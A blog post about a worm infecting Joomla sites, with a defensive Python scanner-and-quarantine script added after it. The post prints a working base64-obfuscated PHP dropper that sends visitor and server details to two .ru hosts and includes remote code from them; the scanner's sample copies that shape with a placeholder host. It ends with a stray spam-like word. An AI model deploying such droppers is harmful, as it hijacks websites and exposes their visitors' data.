Renzki's hack report
I got a very urgent call for help from Renzki this afternoon. All his Joomla sites were throwing a parse error somewhere in the mosce.php file.
After checking Google and the Joomla forum I understood that it's a hack... or more precisely a worm virus. It's very annoying. In almost all directories I see files like remote.php, guest.php, packages.php, tests.php, create.php, etc., and also .htaccess files. Those files all contain much the same script; it is base64-encoded, so we can understand the files by decoding them.
This is one of them:
<? error_reporting(0);
// Collect details of the request that triggered the dropper; the bare
// $HTTP_HOST-style names are register_globals fallbacks for old PHP.
$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
// Beacon: all eight values base64-encoded, dot-separated, ending in ".e",
// sent as the query string of the remote include below.
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s";
// "aHR0cDovLw==" decodes to "http://"; the host literals decode to
// user9.mshtml.ru and user7.htmltags.ru. Whatever the first host serves is
// include()d and executed as PHP; the second host is the fallback.
if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))) {} else { include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str); }
?>
When those encoded strings are decoded they turn out to be websites... usually
http://xxx.xxx.ru
So they really are a virus.
I tried to remove the files manually but there were too many of them. So we had to reinstall Joomla under another path... and rename the Joomla database so it could be used with the new installation, then reinstall all the modules, components and templates one by one. And all that had to be done for every infected site.
That's the problem with open source... (Yes... open source matters) because everybody knows how your files are structured, and if they find a hole, then you're kicked off.
And I wasn't supposed to work today.
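The dropper above is a few hundred bytes of easily recognised code, so locating every copy across a site is a job for a script rather than for hand inspection. The following is an added example, not code from the post or from Joomla: a Python triage script that walks a web root, flags every file that include()s a base64_decode()'d URL (the pattern in the sample), decodes the base64 literals so the hosts become readable, and moves the hits into a quarantine directory instead of deleting them so the evidence survives the cleanup. The directory layout, file names and the placeholder host c2.example.invalid in the embedded sample are constructed for the demo and stand in for the real ones.

```python
"""Triage helper for a base64-obfuscated PHP dropper (added example, not from the post)."""
import base64
import re
import shutil
import tempfile
from pathlib import Path

# Signature: include()/require() whose path starts with base64_decode(...).
REMOTE_INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\s*\(\s*\(?\s*base64_decode\s*\(", re.IGNORECASE)
# Every base64 string literal passed straight to base64_decode().
B64_LITERAL_RE = re.compile(
    r"""base64_decode\s*\(\s*["']([A-Za-z0-9+/]+={0,2})["']""", re.IGNORECASE)

MAX_BYTES = 256 * 1024  # droppers are tiny; skip uploads and images


def decode_literals(src: str) -> list:
    """Decode each base64 literal handed to base64_decode(); keep bad ones visible."""
    out = []
    for m in B64_LITERAL_RE.finditer(src):
        try:
            out.append(base64.b64decode(m.group(1), validate=True).decode("latin-1"))
        except ValueError:  # binascii.Error is a ValueError
            out.append("<undecodable:%s>" % m.group(1))
    return out


def is_dropper(src: str) -> bool:
    """True when the file performs a remote include of a base64_decode()'d URL."""
    return REMOTE_INCLUDE_RE.search(src) is not None


def scan_tree(root) -> list:
    """Return sorted (relative path, decoded literals) pairs for every dropper under root."""
    root = Path(root)
    hits = []
    for path in root.rglob("*"):  # pathlib's glob also matches dotfiles such as .htaccess
        if not path.is_file() or path.stat().st_size > MAX_BYTES:
            continue
        src = path.read_text(encoding="latin-1")  # never raises; we only pattern-match
        if is_dropper(src):
            hits.append((path.relative_to(root).as_posix(), decode_literals(src)))
    return sorted(hits)


def quarantine(root, hits, qdir) -> list:
    """Move every hit out of the web root into qdir, preserving its relative path."""
    moved = []
    for rel, _ in hits:
        dest = Path(qdir) / rel
        dest.parent.mkdir(parents=True, exist_ok=True)
        shutil.move(str(Path(root) / rel), str(dest))
        moved.append(rel)
    return moved


# Constructed sample in the shape of the dropper shown in the post. "aHR0cDovLw=="
# is "http://"; "YzIuZXhhbXBsZS5pbnZhbGlk" is the placeholder "c2.example.invalid",
# used here instead of the real hosts.
SAMPLE_DROPPER = r'''<? error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$str=base64_encode($a).".".base64_encode($h).".$s";
if ((include(base64_decode("aHR0cDovLw==").base64_decode("YzIuZXhhbXBsZS5pbnZhbGlk")."/?".$str))) {} ?>
'''
# A legitimate file that also calls base64_decode, to show it is not flagged.
CLEAN_FILE = "<?php\n$img = base64_decode($_POST['img']);\nfile_put_contents('/tmp/x', $img);\n?>\n"


def demo() -> tuple:
    """Build a throwaway web root (constructed layout), scan, quarantine; return results."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    qdir = Path(tempfile.mkdtemp(prefix="quarantine-"))
    for rel in ("components/com_content/remote.php", "images/.htaccess"):
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(SAMPLE_DROPPER)
    (root / "index.php").write_text(CLEAN_FILE)
    hits = scan_tree(root)
    moved = quarantine(root, hits, qdir)
    leftovers = scan_tree(root)  # web root should be clean once hits are moved out
    shutil.rmtree(root)
    shutil.rmtree(qdir)
    return hits, moved, leftovers


if __name__ == "__main__":
    for rel, decoded in demo()[0]:
        print(rel, "->", decoded)
```

Run it against the document root and read the decoded strings before quarantining anything. The signature is deliberately narrow (a remote include fed by base64_decode) rather than a list of file names such as remote.php or guest.php, which would miss renamed copies and flag legitimate files. Separately, include() of an http:// URL only works when PHP's allow_url_include (PHP 5.2 and later, default Off) or, on older releases, allow_url_fopen is enabled; switching that off in php.ini stops this dropper from loading its payload even before the files are removed, though the files still have to go.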
Hevitra